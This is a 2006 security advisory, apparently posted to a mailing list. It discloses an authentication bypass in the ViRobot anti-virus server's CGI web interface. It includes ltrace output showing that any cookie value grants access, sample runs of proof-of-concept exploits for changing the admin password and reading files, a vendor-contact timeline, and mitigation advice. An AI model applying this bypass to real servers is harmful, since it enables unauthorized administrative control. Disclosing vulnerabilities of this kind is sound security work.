<<< Date Index >>>     <<< Thread Index >>>

[INetCop Security Advisory] Global Hauri Virobot cookie exploit



        ========================================
        INetCop Security Advisory #2006-0x82-028
        ========================================


* Title: Global Hauri Virobot cookie exploit


0x01. Description


Virobot Unix/Linux Server is anti virus program that develop in Global Hauri.
(Product in Unix of SUN Sparc, HP, IBM base and RedHat Linux.)
So that user examines and treats server's virus first,
should login connect to Virobot exclusive use web server.
Web server is being based on apache,
i provide web service through CGI programs that is embodied inside.

Problem of relevant product happens by many common gateway interface web program
that don't confirm user state through produced cookie.
This is fatal authentication vulnerability, and  as a result,
malicious hacker can acquire user id and password,
and server use is possible without login.

test: --

[root@Intel-x86-platform cgi-bin]# pwd
/usr/local/ViRobot/cgi-bin
[root@Intel-x86-platform cgi-bin]# ./filescan
Content-type:text/html

<font size=2>You need to authenticate.</font>
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
__libc_start_main(0x08048c20, 1, 0xbffffbe4, 0x080488b4, 0x0804c3cc <unfinished 
...>
__register_frame_info(0x0804f010, 0x0804f188, 0xbffffba4, 0x080488d9, 
0x4010748c) = 0x40107fc0
printf("Content-type:text/html\n\n")              = 24
...
getenv("REMOTE_ADDR")                             = NULL
memset(0xbffff729, '\000', 511)                   = 0xbffff729
memset(0xbffff6e9, '\000', 63)                    = 0xbffff6e9
uname(0xbfffd558)                                 = 0
gethostbyname("Intel-x86-platform")               = 0x40109f04
inet_ntoa(0x0100007f)                             = "127.0.0.1"
strncpy(0xbfffd4d8, "127.0.0.1", 127)             = 0xbfffd4d8
getenv("HTTP_COOKIE")                             = NULL // HTTP_COOKIE 
variable value need.
atoi(0x0804c4f6, 0x0804c4f6, 0, 0xbffffb5c, 0x0804bf1a) = 3
strcmp("#COM-0003;", "#FSC-0003;")                = -3
strcmp("#COM-0003;", "#COM-0003;")                = 0
printf("<font size=2>%s</font>\n", "You need to authenticate.") = 46
exit(1)                                           = <void>
__deregister_frame_info(0x0804f010, 0xbffffb48, 0x0804c3e1, 0x4010748c, 
0xbffffb5c) = 0x0804f188
+++ exited (status 1) +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export HTTP_COOKIE=test // HTTP_COOKIE 
variable value establishment.
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
...
getenv("REMOTE_ADDR")                             = NULL
memset(0xbffff709, '\000', 511)                   = 0xbffff709
memset(0xbffff6c9, '\000', 63)                    = 0xbffff6c9
uname(0xbfffd538)                                 = 0
gethostbyname("Intel-x86-platform")               = 0x40109f04
inet_ntoa(0x0100007f)                             = "127.0.0.1"
strncpy(0xbfffd4b8, "127.0.0.1", 127)             = 0xbfffd4b8
getenv("HTTP_COOKIE")                             = "test"
getenv("HTTP_COOKIE")                             = "test"
strncmp("test", "ViRobot_ID", 10)                 = 30
strncmp("test", "ViRobot_PASS", 10)               = 30
// Can know that ViRbot_ID and ViRobot_PASS are used by Cookie value.
...
...     // It's executed continuously though cookie value differs.
...
getenv("REQUEST_METHOD")                          = NULL        // 
REQUEST_METHOD variable value need.
strcmp(NULL, "POST" <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export REQUEST_METHOD=GET    // 
REQUEST_METHOD variable value establishment.
[root@Intel-x86-platform cgi-bin]# ./filescan | more
Content-type:text/html

        <html>
        <head>
                <title>ViRobot Linux Server Ver 2.0</title>
...
                                                        <select name=dirs class=
'width-full' size=8 onchange='javascript:document.dir_form.submit()'>
                                                        <OPTION value="/.">.</OP
TION>
                                                        <OPTION value="/..">..</
OPTION>
                                                        <OPTION value="/etc">etc
/</OPTION>
                                                        <OPTION value="/boot">bo
ot/</OPTION>
...
                                <form name=web_vrscan method=post action=webvrsc
an target=new>
                                <td align=right valign=top>
                                        <input type=image src='/images/button_sc
an.gif' border=0><input type=hidden name=web>
                                </td>
                                </form>
                        </tr>
                </table>
        </body>
        </html>
[root@Intel-x86-platform cgi-bin]#

With upside, result that require unrelated cookie value,
I could get easily screen information that administrator utilizes after login.

--


0x02. Vulnerable Packages


Vendor site:
Global HAURI Inc. - http://www.globalhauri.com/ (US & Canada)
HAURI ASIA Pte Ltd. - http://www.hauri.com.sg/ (Singapore)
HAURI JAPAN Inc. - http://www.hauri.co.jp/ (Japan)
China Blue Star Hauri Technology Co., Ltd. - http://www.hauri.com.cn/ (China)
HAURI Latinoamerica S.A. - http://www.haurilatin.com/ (Latin/Mexico)
Hauri do Brazil - http://www.haurilatin.com/ (Latin/Brazil)
Hauri Europe GmbH - http://www.hauri-europe.com/ (Europe)
HAURI Inc. - http://www.hauri.co.kr/ (Korea)

Virobot Linux Server
-eng-linux_i386-eval-20050817.tar
+Turbo 6x/7x, Laser 5/6x/7x, Miracle 2x, Redhat 6x/7x
Virobot Unix Server

Disclosure Timeline:
2003-08.??: Vulnerabilities found.
2003-08.??: 1st vendor contact. (didn't responded)
2005-09.30: 2nd vendor contact. (didn't responded)
2005-10.03: 3rd vendor contact. (didn't responded)
2005-10.08: Deleted free download page in vendor (Ooops).
2006-02.17: 4th verdon contact. (didn't responded)
2006-02.22: Public disclosure.


0x03. Exploit


We have two `Proof Of Concept' codes about bugs.

#1. Virobot web administrator password change exploit:

--
[root@Intel-x86-platform virobot]# head 0x82-viropass.c
/*
**
** 0x82-viropass - Virobot password change exploit (ver2003)
**
** Our INetCop Security Team found this bug for the first time in 2003.
** At that time, vender Global Hauri was no any reaction.
**
** Announce unfortunately now.. (This bug that sleep during 2 years)
**
** exploit result:
[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-viropass localhost 8080 x82 hax0r

 0x82-viropass - Virobot password change exploit (ver2003)

 *********************************************************
 ** This exploit code is may change your virobot server **
 ** administrator id and password.                      **
 *********************************************************

 [1] Set socket.
 [2] Send code.
 [*] Ok, modify admin information. (id: x82, passwd: hax0r)
 [*] exploit successfully.
 [*] Antivirus lose!

[root@Intel-x86-platform virobot]#
--

#2. Virobot remote directory file access exploit:

--
[root@Intel-x86-platform virobot]# head 0x82-virofuk.c
/*
**
** Virobot cookie bug remote exploit (v0.2) [Proof of Concept]
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@xxxxxxxxxxx>.
** My World: http://x82.inetcop.org
**
*/

[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-virofuk localhost 8080

 Virobot cookie bug remote exploit [Proof of Concept]

 [1] Set socket.
 [2] Send code.
 [3] Take and is storing substance.
 [*] Save file name: result.htm
 [*] Please wait for a moment ... [OK]
 [*] Read result.htm file contents.

[root@Intel-x86-platform virobot]# ls result.htm
result.htm
[root@Intel-x86-platform virobot]#
--

Hacker can attempt remote attack through this fatal problems.


0x04. Patch


Problem happens by all CGI programs that can use without cookie information 
value.
So that can inspect cookie value that user always has must add examining 
function or, module.
Formally, before patch comes out, using firewall or iptables by temporary 
expedient,
can establish so that can connect administrator's IP for relevant Web page.

--
Thank you.

P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--



-- 
_______________________________________________
Get your free email from http://www.hackermail.com